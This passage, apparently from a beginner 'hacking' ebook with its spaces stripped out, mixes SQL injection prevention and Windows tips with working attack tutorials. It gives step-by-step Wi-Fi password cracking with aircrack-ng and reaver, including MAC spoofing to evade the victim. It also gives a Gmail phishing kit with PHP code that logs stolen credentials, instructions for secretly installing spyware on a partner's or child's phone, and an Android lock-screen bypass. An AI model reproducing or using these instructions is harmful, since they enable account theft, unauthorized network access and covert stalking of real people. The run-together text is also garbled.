1.)ThesignificantprevalenceofSQLInjectionvulnerabilities,and2.)Theattractivenessofthetarget(i.e.,thedatabasetypicallycontainsalltheinteresting/criticaldataforyourapplication).
It’ssomewhatshamefulthattherearesomanysuccessfulSQLInjectionattacksoccurring,becauseitisEXTREMELYsimpletoavoidSQLInjectionvulnerabilitiesinyourcode.
SQLInjectionflawsareintroducedwhensoftwaredeveloperscreatedynamicdatabasequeriesthatincludeusersuppliedinput.ToavoidSQLinjectionflawsissimple.Developersneedtoeither:a)stopwritingdynamicqueries;and/orb)preventusersuppliedinputwhichcontainsmaliciousSQLfromaffectingthelogicoftheexecutedquery.
ThisarticleprovidesasetofsimpletechniquesforpreventingSQLInjectionvulnerabilitiesbyavoidingthesethreeproblems.Thesetechniquescanbeusedwithpracticallyanykindofprogramminglanguagewithanytypeofdatabase.
SQLinjectionflawstypicallylooklikethis:
Thefollowing(Java)exampleisUNSAFE,andwouldallowanattackertoinjectcodeintothequerythatwouldbeexecutedbythedatabase.Theinvalidated“customerName”parameterthatissimplyappendedtothequeryallowsanattackertoinjectanySQLcodetheywant.Unfortunately,thismethodforaccessingdatabasesisalltoocommon.
Stringquery=“SELECTaccount_balanceFROMuser_dataWHEREuser_name=“+request.getParameter(“customerName”);
try{Statementstatement=connection.createStatement(…);ResultSetresults=statement.executeQuery(query);
}PREVENTIONSOption1:PreparedStatements(ParameterizedQueries):
Theuseofpreparedstatements(parameterizedqueries)ishowalldevelopersshouldfirstbetaughthowtowritedatabasequeries.Theyaresimpletowrite,andeasiertounderstandthandynamicqueries.ParameterizedqueriesforcethedevelopertofirstdefinealltheSQLcode,andthenpassineachparametertothequerylater.Thiscodingstyleallowsthedatabasetodistinguishbetweencodeanddata,regardlessofwhatuserinputissupplied.Preparedstatementsensurethatanattackerisnotabletochangetheintentofaquery,evenifSQLcommandsareinsertedbyanattacker.IfanattackerweretoentertheuserID‘or‘1’=‘1,theparameterizedquerywouldnotbevulnerable.
2.UsedynamicSQLonlyifabsolutelynecessary.
DynamicSQLcanalmostalwaysbereplacedwithpreparedstatements,parameterizedqueries,orstoredprocedures.Forinstance,insteadofdynamicSQL,inJavayoucanusePreparedStatement()withbindvariables,in.NETyoucanuseparameterizedqueries,suchasSqlCommand()orOleDbCommand()withbindvariables,andinPHPyoucanusePDO
withstronglytypedparameterizedqueries(usingbindParam()).
Inadditiontopreparedstatements,youcanusestoredprocedures.Unlikepreparedstatements,storedproceduresarekeptinthedatabasebutbothrequirefirsttodefinetheSQLcode,andthentopassparameters.
3:-EscapingAllUserSuppliedInput
Thisthirdtechniqueistoescapeuserinputbeforeputtingitinaquery.Ifyouareconcernedthatrewritingyourdynamicqueriesaspreparedstatementsorstoredproceduresmightbreakyourapplicationoradverselyaffectperformance,thenthismightbethebestapproachforyou.However,thismethodologyisfrailcomparedtousingparameterizedqueriesandicannotguaranteeitwillpreventallSQLInjectioninallsituations.Thistechniqueshouldonlybeused,withcaution,toretrofitlegacycodeinacosteffectiveway.Applicationsbuiltfromscratch,orapplicationsrequiringlowrisktoleranceshouldbebuiltorre-writtenusingparameterizedqueries.
Thistechniqueworkslikethis.EachDBMSsupportsoneormorecharacterescapingschemesspecifictocertainkindsofqueries.Ifyouthenescapeallusersuppliedinputusingtheproperescapingschemeforthedatabaseyouareusing,theDBMSwillnotconfusethatinputwithSQLcodewrittenbythedeveloper,thusavoidinganypossibleSQLinjectionvulnerabilities.
4.Installpatchesregularlyandtimely.
Evenifyourcodedoesn’thaveSQLvulnerabilities,whenthedatabaseserver,theoperatingsystem,orthedevelopmenttoolsyouusehavevulnerabilities,thisisalsorisky.Thisiswhyyoushouldalwaysinstallpatches,especiallySQLvulnerabilitiespatches,rightaftertheybecomeavailable.
5.Removeallfunctionalityyoudon’tuse.
Databaseserversarecomplexbeastsandtheyhavemuchmorefunctionalitythanyouneed.Asfarassecurityisconcerned,moreisnotbetter.Forinstance,thexp_cmdshellextendedstoredprocedureinMSSQLgivesaccesstotheshellandthisisjustwhatahackerdreamsof.Thisiswhyyoushoulddisablethisprocedureandanyotherfunctionality,whichcaneasilybemisused.
6.UseautomatedtesttoolsforSQLinjections.Evenifdevelopersfollowtherulesaboveanddotheirbesttoavoiddynamicquerieswithunsafeuserinput,youstillneedtohaveaproceduretoconfirmthiscompliance.ThereareautomatedtesttoolstocheckforSQLinjectionsandthereisnoexcusefornotusingthemtocheckallthecodeofyourdatabaseapplications.
SQLINJECTME
TESTINGSQLINJECTIONBYUSINGTOOL
OneoftheeasiesttooltotestSQLinjectionsistheFirefoxextensionnamedSQLInjectME.Afteryouinstalltheextension,thetoolisavailableintheright-clickcontextmenu,aswellasfromTools→Options.ThesidebarofSQLInjectMEisshowninthenextscreenshotandasyoucanseetherearemanytestsyoucanrun:
Youcanchoosewhichteststorunandwhichvaluestotest.WhenyoupressoneoftheTestbuttons,theselectedtestswillstart.Whenthetestsaredone,youwillseeareportofhowthetestsended.
TherearemanyoptionsyoucansetfortheSQLInjectMEextension,asshowninthenexttwopictures:
Asyousee,therearemanystepsyoucantakeinordertocleanyourcodefrompotentialSQLinjectionvulnerabilities.Don’tneglectthesesimplestepsbecauseifyoudo,youwillcompromisethesecuritynotonlyofyoursitesbutalsoofallthesitesthatarehostedwithyourwebhostingprovider.
WPA2TESTING
WI-FIHACKINGUSINGBACKTRACK
AfterperformingtheSQLinjection,Icanbetthatnowyouhavetheendlesscuriositytoexploremoreabouttheethicalhacking.AndasaccordingtoyourneednowinthisarticlewearegoingtoperformahardcorehackusingBacktrackLinux.wearegoingtolearnthathowtocracktheWI-FIusingBacktrack.onemorethingIwanttoaddherethatallthesestuffIamsharingwithyouisonlyforstudypurpose.ifyouhavetheblackintentionsjustleavethebooknow.Ifyouareperformingthisarticleonyourcomputer,youwillberesponsibleforanydamageoccurredbyyou.
Solet’sstartthearticle:
NowletusstartwiththeWi-Ficracking.ButbeforestartingthetutorialletmegiveyouasmallintroductiontowhatWi-Fihackingisandwhatisthesecurityprotocolsassociatedwithit.
Inasecuredwirelessconnectedthedataoninternetissentviaencryptedpackets.Thesepacketsaresecuredwithnetworkkeys.Therearebasically2typesofsecuritykeys:
WEP(WirelessEncryptionProtocol):-Thisisthemostbasicformofencryption.Thishasbecomeanunsafeoptionasitisvulnerableandcanbecrackedwithrelativeease.Althoughthisisthecasemanypeoplestillusethisencryption.WPA(WI-FIProtectedAccess):Thisisthemostsecurewirelessencryption.Crackingofsuchnetworkrequiresuseofawordlistwithcommonpasswords.Thisissortofbruteforceattack.Thisisvirtuallyuncrackableifthenetworkissecuredwithastrongpassword
Solet’sbegintheactualWi-FiHackingtutorial!InordertocrackWi-Fipassword,yourequirethefollowingthings:
FortheWi-FihackingyouneedtoinstalltheBacktrackonyourcomputer.
IamassumingthatyouhavealreadyinstalledtheBacktrackonyourpc.Ifnotit’sveryeasytoinstallbymakingbootableliveCD/DVD.ForinstallingprocessesyoucanjustGoogleit.Youwillgetiteasily.
Nowopentheconsolefromthetaskbar,Clickontheiconagainstthedragonlikeiconinthetaskbarintheabovescreenshot.YouwillhaveaCommandPromptlikeShellcalledasconsoleterminal.
1)Let’sstartbyputtingourwirelessadapterinmonitormode.Itallowsustoseeallofthewirelesstrafficthatpassesbyusintheair.Typeairmon-ngintheconsoleterminalandpressEnter.Youwillhaveascreenlikethis,notedownthenameofinterface,inthiscasethenameiswlan0.
2)Nowtypeifconfigwlan0downandhitenter.
Thiscommandwilldisableyourwirelessadapter;wearedoingthisinordertochangeyourMACaddress.
Now,youneedtohideyouridentitysothatyouwillnotbeidentifiedbythevictim.todothisyouneedtotypeifconfigwlan0hwether00:11:22:33:44:55andhitenter.
ThiscommandwillchangeyourMACaddressto00:11:22:33:44:55.3)Nowthenextworkistotypeairmon-ngstartwlan0andpressenter.
Thiswillstartthewirelessadapterinmonitormode.Notedownthenewinterfacename,itcouldbeeth0ormon0orsomethinglikethat.
Theabovecommandintheconsolehasstartedyournetworkadapterinmonitormodeasmon0:
4)Nowthatourwirelessadapterisinmonitormode,wehavethecapabilitytoseeallthewirelesstrafficthatpassesbyintheair.Wecangrabthattrafficbysimplyusingtheairodump-ngcommand.
Thiscommandgrabsallthetrafficthatyourwirelessadaptercanseeanddisplayscriticalinformationaboutit,includingtheBSSID(theMACaddressoftheAP),power,numberofbeaconframes,numberofdataframes,channel,speed,encryption(ifany),andfinally,theESSID(whatmostofusrefertoastheSSID).Let’sdothisbytyping:
airodump-ngmon0
Intheabovescreenshotthereisalistofavailablenetworks,Choose1networkandnotetheBSSIDandchannelofit.5.)Typeairodump-ng-cchannelno–bssidBSSIDN1mon0-wfilenameandhitenter.
Replacechannelno.andBSSIDN1withthedatafromstep4.Replacethemon0withnetworkinterfacenamefromstep3.Inplaceoffilenamewriteanynameanddorememberthat.Betterusefilenameitself.
Thiscommandwillbegincapturingthepacketsfromthenetwork.YouneedtocapturemoreandmorepacketsinordertocracktheWi-Fipassword.Thispacketcapturingisaslowprocess.
6.)Tomakethepacketcapturingfaster,wewilluseanothercommand.Openanewshell,don’tclosethepreviousshell.Innewshelltypeaireplay-ng-10-aBSSIDN1-h00:11:22:33:44:55mon0andhitenter.
ReplacetheBSSIDN1withthedatafromstep4andmon0fromstep3.Thiscommandwillboostthedatacapturingprocess.The-1tellstheprogramthespecificattackwewishtousewhichinthiscaseisfakeauthenticationwiththeaccesspoint.The0citesthedelaybetweenattacks,-aistheMAC
addressofthetargetaccesspoint,-hisyourwirelessadaptersMACaddressandthecommandendswithyourwirelessadaptersdevicename.
7.)Nowwaitforfewminutes,lettheDATAintheotherconsolereachacountof5000.
8.)Afteritreaches5000,openanotherconsoleandtypeaircrack-ngfilename-01.capandhitenter.Replacethefilenamewiththenameyouusedinstep5.Add-01.captoit..capistheextensionoffilehavingcaptureddatapackets.Aftertypingthiscommand,aircrackwillstarttryingtocracktheWi-Fipassword.IftheencryptionusedisWEP,itwillsurelycrackthepasswordwithinfewminutes.
IncaseofWPAusethefollowingcommandinsteadoftheaboveaircrack-ng-w/pentest/wireless/aircrack-ng/test/password.lst-bBSSIDN1filename-01.cap
ReplaceBSSIDN1andfilenamewithdatayouused./pentest/wireless/aircrack-ng/test/password.lstistheaddressofafilehavingwordlistofpopularpasswords.IncaseofWPAaircrackwilltrytobruteforcethepassword.AsIexplainedabovethattocrackWPAyouneedafilehavingpasswordstocracktheencryption.Ifyouareluckyenoughandthenetworkownerisnotsmartenough,youwillgetthepassword.
PREVENTION:
Forthepreventionfrombeinghackedyoucanrefertothechapter
“PASSWORDCREATINGPOLICIES”.
NEWBIE’SWAYTOWARDSREVERSEENGINEERING
Now-a-dayspeopleexpectmorethansomethingwithanapplicationasitisprovidedbythedevelopers.Peoplewanttousethatspecificapplicationaccordingtotheirownpreferences.Sonowweareherewithanarticleonthetopicreverseengineering.Let’sstartwithsimpleengineering,“simpleengineering”isthetasktodevelop/buildsomethingBUTReverseengineeringreferstothetasktoredevelop/re-buildsomething.Insimplewordsreverseengineeringisthetasktomodifythesourcecodeoftheapplicationtomakeitworkaccordingtoourway,Reverseengineeringisaverycomplicatedtopicandisverydifficulttounderstandforbeginnersasitrequiresapriorknowledgeofassemblylanguage.
Developingiseasybuttore-developingisnoteasy!!Becausewhiledevelopmentaprogrammerhastodealwiththefunctions,pointers,conditions,loopsetc…ButwhileDE-compilationprocessweneedtodealwithregisters!
Generally32bit/64bitwindowssupportsmainly9registers:–
PerformingRegisters———————–>EAX:ExtendedAccumulatorRegister
>EBX:BaseRegister>ECX:CounterRegister>EDX:DataRegister
Index———>ESI:SourceIndex
>EDI:DestinationIndex
Pointer———–>EBP:BasePointer
>ESP:StackPointer>EIP:InstructionPointerSo,let’smovetowardsourway“Howtomodifytheapplications”Thegeneralrequirementsyouneedforthemodificationarelistedbelowandeasilyavailableontheinternet:–1.OllyDBG
2.CrackMeApp(clickheretodownload)(registerandactivateyouraccountbeforedownload)PROCESS:
Whenyouhavedownloadedboththeapps,firstofallyouneedtolaunchtheCrackMe
App.Itwillaskyoutoenterthepassword,enteranypasswordyouwantandhiton“OK”.
Nowitwillshowyoutheerrorthat“Youarenotauthorizedtousetheapplication”.
NowopentheOllyDBGandopentheCrackmeappinit.WhenyouhaveopenedtheCrackmeappinOllyDBG,nowintheupperleftbox,whilescrollingupyoufindthestatementlikethis:–JESHORTPassword.00457728
Basically,thisisaconditionaljumpthatmeansiftheconditionistruethenitwilljumpto00457728Whichshowsusthemessage“Youarenotauthorizedtousetheapplication”andiftheconditionisnottrueitjustcontinuesreadingthecode,Sowedon’tneedthisjumptoworkaswedon’twanttogettheerrormessage.
Nowforremovingtheerrormessage,wecanchangeJESHORTPassword.00457728toJNESHORTPassword.00457728,JNE(JumpIfNotEqual)meansthatifthepasswordiscorrectitwillgiveyoutheerrormessageandifthepasswordisincorrectitwillgiveyouthecorrectmessage.
ForchangingthequeryjustdoubleclickthelineJESHORTPassword.00457728andsimplychangeittoJNESHORTPassword.00457728andHiton“Assemble”.
NowHITonblue“PLAY”buttonintheuppersideoftheOllyDBGtostarttheCrackmeappagainandenterthepasswordthenitwillgiveyouthecorrectmessage.
PHISHINGATTACKAHEAD
EMAILANDFACEBOOKHACKINGBYPHISHING
Whatisphishing?
Phishingisanattemptbythesendertohavethereceiveroftheemailtoreleasetheirpersonalinformationi.e.theattackerluresthevictimstogivesomeconfidentialinformation.
Whyphishing?
Therearemanypasswordcrackingtoolsthatarecomingandgoinginto/fromthemarket.Butphishingisthemostefficientmethodtostealconfidentialinformationlike,passwords,Creditcardnumbers,Bankaccountnumbersetc.
Howphishingworks?
Itworksjustlikenormalfishing.Afishermangenerallythrowsbaitintothewatertolurethefish.Thenafishcomestotakethefoodfeelingthatitislegitimate.Whenitbitesthebait,itwillbecaughtbythehook.Nowthefishermanpullsoutthefish.
Inthesameway,thehackersendsafakeloginpagetothevictim.Thevictimthinksthatitisalegitimateoneandentershisconfidentialinformation.Nowthedatawillbewiththehacker.Now,let’slearnhowtohackbyphishing:IamselectingGmailaccounttobehackedbyphishing.
Forphishingyouneedthefollowingstuffs:Firstofallyouhavetoopenthegamil.combyyourbrowserandwhenpageopencompletely,justgivearightclickonthepageandadialogueboxwillopensafteryouhavinganoption“viewpagesource”init.Clickonthe“viewpagesource”optionandyouseethatthesourcecodeofthatpagewillopensafteryou.Thenpressctrl+Ftoopenthetext/wordfindingbox.Type“action=”andreplaceitwithanything.phpSuchas“action=mail.php”Thenfindforthe“method=”andalsoreplaceitwith“get”.Suchasmethod=”get”.
Thensavethefilebyanything.htmlSuchas“Gmail.html”Thencreateablanknotepadfile“log.txt”Theagainopenthenotepadandtypethefollowingcodes:
<?phpheader(“Location:http://www.Gmail.com”);$handle=fopen(“logs.txt”,“a”);foreach($_GETas$variable=>$value){fwrite($handle,$variable);fwrite($handle,“=”);fwrite($handle,$value);fwrite($handle,“\r\n”);}fwrite($handle,“\r\n”);fclose($handle);exit;?>
Andsaveitas“mail.php”(savethisfilebysamenameasyouhavereplacedthe“action=”)Nowfinallyyouhavethethreefileswhicharerequiredforthephishing.1)Gmail.html(fakeloginpage)2)mail.php(tocapturethelogindetails)3)log.txt(tostorethecaptureddetails)
Procedure:step1:createanaccountinanyfreewebhostingsitelikewww.bythost.comwww.000webhost.comwww.ripway.com
www.my3gb.com
step2:Nowuploadallthethreefilesyouhavedownloaded.(Ihavetakenwww.my3gb.com)step3:Givethelinkofthefakepagetoyourvictim.
eg:www.yoursitename.my3gb.com/Gmail.htmlStep4:whenheclicksthelink,itopensafakeGmailpagewhereheentershislogindetails.Whenheclickssigninbutton,hislogin
detailswillbestoredinlog.txtfile.Demonstration:HereIhaveuploadedmyscriptsonto
www.my3gb.com
AndcopytheGmail.htmllinkwhichyouhavetosendthevictim.iclickedtheGmail.htmllinkAfakepagewasopenedwhereienteredmylogindetails.
ThispagewilllooksexactlysimilartotheoriginalGmailloginpage.Andwhenthevictimentershis/herlogindetailsforlogginginintohis/heraccount.Now,thistimethevictimwillredirectedtotheoriginalGmailloginwebsite.Thevictimwillevendon’tknowthathis/heraccountgothacked.Victimwillthinkthatthepagegetsreloadedduetointerneterrorsorloginmistakesetc.
Nowhis/herlogindetailswerecapturedbythephpscriptandstoredinlog.txtfileasshowninthefigurebelow:
InthesamewayyoucanhackFACEBOOKaccountsandothersocialnetworkingaccounts.Howtoprotectourselvesfromphishing?Don’tuselinksBesuspiciousofanye-mailwithurgentrequestsByusingsecuredwebsitesUsingefficientbrowsersUsingAntivirusorinternetsecuritysoftware.
USBSECURITY
SecuringPenDrivesFromMaliciousViruses
Today,agiantdownsideforwindowsuseristosecuretheirdatafromviruses.Especially,inPendrives,nobodyneedstokeeptheirvitaldatainpendrivesasaresultofpendrivessquaremeasuretransportabledevicesandthroughsharingdataitmaygetinfectedbyviruslikeshortcutvirus,Autorun.inf,andnewfoldervirusetc.SomefolksrecovertheirdatabymerelyusingCommandprompthoweversomefolksassumethere’ssolelypossibilityleftanditistoformatthependrive.
So,ifyourpendriveisinfectedbyanyofthosevirusyoucanmerelyfollowthesesteptoinduceyourhiddendataback.
OpenCMD(commandprompt)OpenFlashdriveinCMD(ifyourdriveis‘G’thanenter‘G:’afterc:\user\press[ENTER])Nowtypefollowingcommandandhitenter:attrib-s-h/s/d
Nowopenyourpendriveinwindowsyoumayseeallofyourfiles.Howeverwait!isitenough?Noway!yourpendriveisstillnottotallysecure.Higherthancommandsimplyshowsallofyourfilesthatsquaremeasurehiddenbyviruses.IfyouwanttoshieldyourUSBfromobtainingunwantedfilesi.e.virus,worm,spy,Trojanetc.thenyouneedtofollowthesesteps.
WhatI’mgoingtotellyouisthatawaytosetupyourregistrytofinishacomputerfromsavingfilestoyourUSB.Ifyouhavewindowssevenorwindowseightthenyou’llimmobilizethewritingchoicetoUSBdrives.ThistrickisincrediblyusefulifyouhavevirusinyourlaptopandwanttorepeatfilesfromaUSBDrivehoweveralsodon’twanttotransfervirustotheUSB.FollowthegivenstepstodisabletheUSBwritingoption:
Opennotepadandreplicaandpastethefollowing:
WindowsregistryEditorVersion5.00[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies]
“WriteProtect”=dword:00000001Nowkeepthefilewiththeextension“.reg”.
Clickonthefileyounowsaved.withinthepop-upwindowselectedaffirmativeandthenOK.That’sityourUSBiscurrentlysecureTURNINGTHESECURITYOFF
TojustoffthissecuritymeasureOpennotepadandcopyandpastethefollowing:WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies]“WriteProtect”=dword:00000000
Nowoverlookedthefilewiththeextension“.reg”.Clickonthefileyoucurrentlysaved.withinthepop-upwindowclickaffirmativeandthenOK.That’sityourdefenseiscurrentlydisabled.
PDFSECURITY
HOWTOPROTECTYOURPDFFILESFROMCOPYING
Nowthesedaysit’sabigdealtosecureyourPDFdocuments.InthisarticleIwillshowyouthat“HOWTOPROTECTYOURPDFFILESFROMBEINGCOPIEDFORPIRATIONANDOTHERMALITIOUSINTENTIONS”.
ForprotectingyourPDFfilesyoucanuseatool“A-PDFpasswordsecurity”toprotectaPDFfile.YoucansetpasswordandpreventpeoplefromcopyandpastePDFcontents,hereisaneasytutorialtomakeyouawareabouttheuseofthattool.
Installthe“A-PDFpasswordsecurity”.Launchtheprogramandopenthepasswordprotectwizard.
selecttheoption“singlepdfdocumentsecurity”andpushthebutton“next>”Click“browse”buttontoopenapdffilewillbeencrypted,select thesecuritylevelandencryptionmethod.Youcansetuppasswordforopeningandmodificationofyourdocument.
Click“save”or“saveas”tosetadocumentopenpasswordanddisallowcopyingpermission.
AftersavingthefileyouwillchoosetoopensavedPDFfilewiththedefaultPDFviewer,setanotherPDFfilesecurityoropendestinationfolderinwindowsexplorer.
OpensavedPDFfilewiththedefaultPDFviewer.
NOTIFYME
SENDINGAMESSAGETOOTHERUSERINYOURPC
Inthisarticlewearegoingtolearnthathowtosendanymessagetotheotheruseraccountassociatedwithyourownpc.
Let’sassumeifyouwanttoleaveanymessageforyourbrotherandsisterwhohaveuseraccountsassociatedwiththesamepcinwhichyouhavealsoauseraccount.
Sofollowthesestepstopassanymessagewhichyoutoanotheruseraccountathisnextlogin.
OpenthetaskmanagerofyourpcbyclickingCTRL+ALT+DELkeyssimultaneously.Thenclickonuseroptiontoviewtheavailableuseraccountassociatedwithyourpc.
Selectanyanotheruseraccountwhichyouwanttopassthemessage.Thenclickonthe“sendmessage”optionplaceinthelowerrightcorner.
Adialogueboxwillbeopenafteryou.Typeanymessageyouwanttoconveythem.If youwanttoshockthemthenyoucantype“HELLOUSER…YOURCOMPUTERISINFECTEDBYTROJAN”
Andwhenanotheruserlogintohis/heruseraccount,thesamemessagewillbedisplayedtohim.
“IAMAFOLDERIDON’THAVEANAME”––—?HOWTOCREATEAFOLDERWITHEMPTYNAME
Thisisthemostinterestingarticleofthisbook,andhereIwillshowyouthathownocreateafolderwithoutnamingit.Sometimesitwillbeveryusefulforyou.
Let’sassumeyouhavehidedanyfoldersimply.Andwhenyouwillsearchitbynamefromtheaddressbaritwillbeopenedeasily.Solet’sthinkthatiftherewillbeanyfolderwithoutnamethenhowcanitbepossibletosearchitfromaddressbarorsearchbox.Sofollowthesestepstocreateafolderwithoutname:Openthelocationwhereyouwanttocreatethefolder.Justrightclickanywheretocreatethefolder.
WhenitaskstorenamethefolderjustclickALTkeyandbykeeppressingtheALTkeypress“2,5,5”onebyone.Andthenenter.
Youwillfindthatthereitcreatesafolderwithouthavinganyname.
SPYINGWITHANDROID
HACKINGANDROIDPHONE
Hellofriends,nowinthisarticlewewilllearnthathowtospyoveranandroidphone.Nowthesedaysaretheeraofsmartphonesbasedonandroidspecially.InthisarticleIwillshowyouthathowtogetthedetailsofthevictimbyspyingovervictim’sandroidphone.Thisisthebestwaytokeeptrackingyourchildandalsoyourgirlfriends.
ForspyingnowIamusingatoolnameasTHETRUTHSPY.
Byusingthistoolyoucaneasilykeeptrackingthevictim’sandroidphone.
Iamshowingyouthescreenshotsofthosethingswhichwecanspyfromanandroidphone…suchasCALLHISTORY,WHATSAPPMESSAGES,andSMSDETAILSetc.…listisshownbelowinthescreenshot.
Note:-thistoolisalsoavailableforIOSdevices.
Youhavetofollowthestepstostartspying.
Firstofallyouhavetodownloadtheapkfileofthistoolandinstallitonthevictim’sandroidphoneandlogintoit.Thistoolisonlyof800kbsoyoucaneasilymanageitwithinseconds.Averyinterestingthingisaboutthistoolisthatyoucanalsohidethistoolfromthevictimsandroidphone.sothatvictimwillnotawareaboutit.Nowyoucandownloadtheapkfilefromthewebsite(my.thetruthspy.com).Afterinstallingtheappgoonthesamewebsiteoftheappbyyourcomputerandresisterusingyouremailidandlogintoviewthedetailsofthevictim’sandroidphone.ForgettingdetailsgetensurethatthedataconnectionofthevictimsphoneshouldbeON.Whenyouwanttounhidetheappfromthevictim’sphonejust makeacallfromthevictim’sphoneto#2013*.
Note:-sometimesthis“thetruthspy”isstopworking.soyoucanalsosearchanyotherspytoolbysimpleGooglesearches.Youwillfindalotoftoolslikethisandhavealmostsamefunctioning.
MOBILE:“ICANCONTROLYOURPC”
FULLCONTROLYOURPCBYPHONE
NowIhaveaveryinterestingthingforyou……Iknowyougottiredbythosedifficulthackingschaptersmentionedinabovechapters.
InthisarticleIaregoingtotellyouthathowtocontrolyourcomputerfullybyyourmobilephone.It’saveryinterestingthingforyouifyougottiredbyusingthetrackpadandkeyboardofyourcomputer.
Solet’sseehowtodoit:InthisarticleIamgoingtouseatoolnameasUNIFIEDREMOTEwhichisusedtoremoteourpc.
Unifiedremoteisanappthatletsyoucontrolyourentirewindowscomputerfromyourandroiddevice.itturnsyourdeviceintoaWi-FiorBluetoothremotecontrolforalltheprogramsonyourcomputer.Withthisappyoucancontrolawiderangeofapplications,includingsimplemouseandkeyboard,mediaplayersandotherexternalgadgetsthatcanbeconnectedtoyourcomputer(suchasUSB-UIRTandtellstick).itevenprovidesextensivecapabilitiesforuserstocreatetheirowncustomremotesfortheirneeds.
Youhavetofollowthesimplestepstoremoteyourpcbyunifiedremote:
Downloadandinstalltheunifiedremoteserveronyourcomputer(windows).YoucaneasilyfinditbyyourGooglesearches.Whenyouinstalledit…..Launchit.
ConnectyourandroidphonetothesameWi-Finetworkasyourcomputer.AlternativelyifyourcomputeridBluetoothready,pairitwithyourphone.
Downloadandinstalltheapkfileofunifiedremotefromtheplaystore.Atlaunch,confirmthatyouhaveinstalledtheserver.
Thenaddanewserver,select“automatic”andtheappwillfind yourcomputer.Tapyourcomputersnametoconnect.Nowyouarereadytostartcontrollingyourcomputerwithphone.Tapremoteintheapp.
The“Basicinput”remotewillpromptthemouse,whichyoucanuseasatrackpad.Instructionsforusingthemousewillappearonscreen.Alsotherearelotofoptionsareavailablebywhichyoucancontrolyourcomputerindifferentways.
Example:-keyboardcontrolling,filemanager,media,power,start,YouTubeetc.
LAUNCHGODMODE
LAUNCHINGWINDOWSGODMODE
HereIhaveanicewindowstrickforyouwhichsavesyourmuchtime.InthisarticlewewilllearnthathowtolaunchGODMODEinyourcomputer.
Windowsgodmodeisasimplewaytocentralizedaccessalltheadministrativeoptionsthatarenormallyseeninsidecontrolpanelintoanewlycreatedfolderwhichcanbeplacedanywhereinsidecomputer.Usuallytheadministrativeoptionsareseenscatteredinsidethecontrolpanelarrangedindifferentcategoriesandsubcategories.Windowsgodmodearrangesalltheadministrativeoptionsinsideonesinglewindow.Youfinditmuchmoreneatlyarrangedanduserfriendly.
Let’sseehowtolaunchgodmodeinsimplesteps:Youneedtocreateanewfolderforthislaunch.Rightclickatthewindowwhereyouwanttocreateanewfolder.Whenitasksyoutorenamethatfolderyouhavetoenter
followingcodeswithanyword.
Example:Ujjwal.{ED7BA470-8E54-465E-825C99712043E01C}OrSaurabh.{ED7BA470-8E54-465E-825C-99712043E01C}OrAnything.{ED7BA470-8E54-465E-825C-99712043E01C}
Don’tforgettousecurlybrackets.Afterrenamingthefolderpressenter.
Andyouwillseethattheiconofthatfolderwillbechangedandwhenyouwillopenityouwillfindallthesettingsarrangedinwellmannerinit.
CRACKINGLOCKSCREEN
HOWTOCRACKANDROIDLOCKSCREEN
Inthisarticlewearegoingtolearnthathowtobypasstheandroidlockscreen.
WearegoingtobypassthelockscreenusingatoolnameasAromaFilemanager.
Thisisthebestmethodforcrackandroidpatternlock;youmusthavecustomrecoveryinstalledonyourdeviceinordertousethismethod.Let’sstartthecrackingandroidlockscreen.
FirstofalldownloadAromaFilemanagerzipfile.Googleitandyouwillfinditeasily.
NowcopythisAromafilemanagerziptorootofyourSDcard.AftercopyingzipfiletoSD,bootyourphoneintoRecoverymode(Eachphonehasdifferentkeycombinationtobootupinrecoverymode,youcansearchitonGoogle).
Inrecoverychoose“installzipfromSDcardorapplyupdatefromSDcard”,nowselectAroma.zipwhichyouhavedownloadedearlier.
AfterinstallingorupdatingAromafilemanagerwillopen,usevolumeupanddownkeysforScrollingasyoudoinrecovery.InAromafilemanagergotomenuwhichislocatedatbottomstripafterclickingmenuselectsettings.Gotobottominsettingsandthenselect“mountallpartitionsinstartup”aftermountingexitAromafilemanager.NowlaunchAromafilemanageragain.InaromaGotoData>>System.Youwillfind“Gesture.key”ifyouhaveappliedgesturelockor“Password.key”ifyouhaveappliedpassword.
Longpress“Gesture.key”or“Password.key”whichoneisavailable,afterlongpressingit
willpromptsomeoption,choosedeleteanddeletethatfileandrestartyourdevice(firstexitfromaromafilemanagerthenrestartyourphone).
Yuppie!Yourphoneisunlockednow.Afterrebootingitwillaskyouforlockpatterndon’tworrynowyoucanuseanypattern,youroldpatternhasgoneaway.
REAVERBACKTRACK
WI-FICRACKINGUSINGREAVERINBACKTRACK
Well,inthisarticleIwillshowyouthathowtocrackWPA2-PSKkeyusingatoolnamesasREAVER.Reaverusetocrackthekeybybruteforcemethod.
Let’sseehowtocrackthekeyusingBacktrack.NowIamusingBacktrack5r3.Soopentheconsoleandfollowthegivensteps:Firstthingistodoisrunthecommand:Airmon-ngstartwlan0
Nowthenextcommandtowriteis:Airodump-ngwlan0WiththiscommandwelookforavailablenetworksandinformationregardingBSSID,
PWRBeacons,data,channeletc… Nowyouneedtorunthefollowingcode:Reaver-imon0-b-cBSSID–cchannelnetworknameNote:-UsethevaluesofBSSIDchannelandnetworknameintheabovecommand.
Ihaveexecutedthecommandanditstartstoworkasshowninthepicturebelow:
Nowyouhavetowait,timetakenisdependentonthestrengthofpasswordandthespeedofyourinternetconnection,
AndfinallyafterbruteforcingitwillgiveyoutheWPA2pin.
WINDOWSSHORTCUTS
SOMEUSEFULWINDOWSSHORTCUTS
1.WindowsKey+Tab:Aero2.WindowsKey+E:LaunchesWindowsExplorer3.WindowsKey+R:RunCommandbox4.WindowsKey+F:Search5.WindowsKey+X:MobilityCenter6.WindowsKey+L:LockComputer7.WindowsKey+U:EaseofAccessbox8.WindowsKey+P:Projector9.WindowsKey+T:CycleSuperTaskbarItems10.WindowsKey+S:OneNoteScreenClippingTool11.WindowsKey+M:MinimizeAllWindows12.WindowsKey+D:Show/HideDesktop13.WindowsKey+Up:MaximizeCurrentWindow14.WindowsKey+Down:RestoreDown/Minimize15.WindowsKey+Left:TileCurrentWindowtotheLeft16.WindowsKey+Right:TileCurrentWindowsRight17.WindowsKey+#(anynumber)18.WindowsKey+=:Magnifier19.WindowsKey+plus:Zoomin20.WindowsKey+Minus:Zoomsout21.WindowsKey+Space:Peekatthedesktop
DATAFORENSICS
HOWTORECOVERPERMANENTLYDELETEDFILES
Inthisarticlewewilllearnthathowtorecoverourpermanentlydeletedfilesfromourcomputer.Sometimesyourimportantdataisaccidentlydeletedfromyourcomputeraswellasfromrecyclebinalso,andit’sveryimportanttorecoverthatfileordata.
